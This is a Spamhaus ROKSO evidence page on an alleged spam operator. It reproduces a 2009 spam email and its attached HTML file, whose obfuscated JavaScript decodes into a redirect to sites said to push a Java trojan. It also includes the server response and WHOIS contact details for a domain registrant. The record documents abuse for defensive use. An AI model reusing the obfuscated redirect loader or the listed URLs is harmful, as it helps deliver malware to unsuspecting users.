ROKSO Home  |  ROKSO FAQs & Policies  |  About Spamhaus  |  FAQs
ROKSO
The Register of Known Spam Operations
Sebastian Foss

Evidence Menu:

Sebastian Foss Index


Country: Germany
State:
Lives in Germany, has used addresses in New York. He's involved in many Internet schemes and scams including e-mail and blog spamming, and MMF/MLM. He spams via proxies on dynamic IP addresses, has bulletproof hosting in China, and is involved in malware.


Sebastian Foss SBL Listings History
Current SBL Listings
Archived SBL Listings

Attached HTML Files, Javascript Obfuscation, Trojan Download


As of January 2009, Sebastian Foss is sending spam with attached HTML files that contain a javascript that redirects users to his web site. The final destination that the script will redirect to can be changed on the fly, presumably when one of Foss's servers or domains is blocklisted, or when a server is taken down for spam and abuse.

Here is a sample of the spam he sends with the attached HTML file:

Received: from yahoo.com ([124.236.241.66])
by <redacted> (8.14.1/8.12.11) with SMTP id <redacted>
for <redacted>; Sat, 10 Jan 2009 13:47:43 -0800 (PST)
Message-ID: <<redacted>@yahoo.com>
Date: Sun, 11 Jan 2009 <redacted> +0400
From: "eBay Cash Machine" <globalbox02wupkp@yahoo.com>
User-Agent: Opera/6.05 (Windows 2000; U) [ja]
X-Accept-Language: en-us
MIME-Version: 1.0
To: <redacted>
Subject: Quit Your Day Job Within 30 Days
Content-Type: multipart/mixed;
boundary="------------<redacted>"

<snip>

"How would you like an extra $250 - $1000 a week on eBay with 15 minutes of
your time ?"<br>

<snip>

<p><font face="Arial" size="3"><b>For Full Details please read the attached
html file</b><br>

<snip>

Here is the HTML file attached to this spam:

<!--hppage status="protected"-->
<!--HTML--><!--HEAD--><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">#//JGCF//%3C>#//-JGCF//%3C"));//--></SCRIPT><!--/HEAD--><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">dpcogqgv%3C>dpcog%22qpa? jvvr8--56,:3,:3,47-|angfm-a-acqj- %3C>-dpcogqgv%3C"));//--></SCRIPT><!--BODY--><NOSCRIPT>To view Full Details please click on the above bar and "Allow Blocked Content". Thank you!</NOSCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">#//@MF[//%3C>#//-@MF[//%3C"));//--></SCRIPT><!--/BODY--><!--/HTML-->



This HTML file, in one four-hour period, redirected to the following URLS:

http://www.advertise-bz.cn/cash/
http://www.promote-biz.com/cash/

There are inevitably going to be other URLs.

These URLs download a Java trojan on the user's computer if the browser allows it.



--- reading URL http://www.promote-biz.com/cash/
--- contacting host www.promote-biz.com [61.164.113.124] on port 80

HTTP/1.1 200 OK
Content-Length: 558
Content-Type: text/html
Content-Location: http://www.promote-biz.com/cash/index.htm
Last-Modified: Thu, 08 Jan 2009 14:24:40 GMT
Accept-Ranges: bytes
ETag: "546ce3d79c71c91:264"
Server: Microsoft-IIS/6.0
Date: Mon, 12 Jan 2009 __:__:__ GMT
Connection: close

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>eBay Cash Machine</title>
</head>
<script type="text/javascript">
if(top!= self) top.location.href = self.location.href
</script>
<frameset rows="40,*">
<frame src="http://61.164.113.124/x/bar/bar.htm">
<frame src="http://61.164.113.124/x/af/cash/">
<noframes>
<body>

</body>

</noframes>
</frameset>

</html>

--- connection closed




[whois.paycenter.com.cn]

Domain Name : promote-biz.com
PunnyCode : promote-biz.com

Registrant:
Organization : wang han
Name : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000

Administrative Contact:
Name : wang han
Organization : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000
Phone Number : 86-028-83267543
Fax : 86-028-83267543
Email : mico9520@sina.com.cn

Technical Contact:
Name : wang han
Organization : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000
Phone Number : 86-028-83267543
Fax : 86-028-83267543
Email : mico9520@sina.com.cn

Billing Contact:
Name : wang han
Organization : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000
Phone Number : 86-028-83267543
Fax : 86-028-83267543
Email : mico9520@sina.com.cn




The Register of Known Spam Operations (ROKSO) collates information and evidence on entities with a history of spamming or providing spam services, and entities affiliated or otherwise connected with them, for the purpose of assisting ISP Abuse Desks and Law Enforcement Agencies.
The address of this ROKSO record is: http://www.spamhaus.org/rokso/evidence/ROK8582/

The above consists of information in the public domain. The Spamhaus Project makes every effort to avoid errors in information in the ROKSO database, and will correct any errors as soon as it is able to verify the correction, but accepts no responsibility or liability for any errors or omissions, or liability for any loss or damage, consequential or otherwise, incurred in reliance on the material in these pages. The Spamhaus Project makes no warranties or representations as to the accuracy of the Information in ROKSO records. The information in the ROKSO database is for information purposes only and is not intended as legal advice of any kind.

For information on contacting the ROKSO Team regarding any factual errors in this record, see the ROKSO FAQs.
© 1998-2014 The Spamhaus Project Ltd. All rights reserved.
Legal  |  Privacy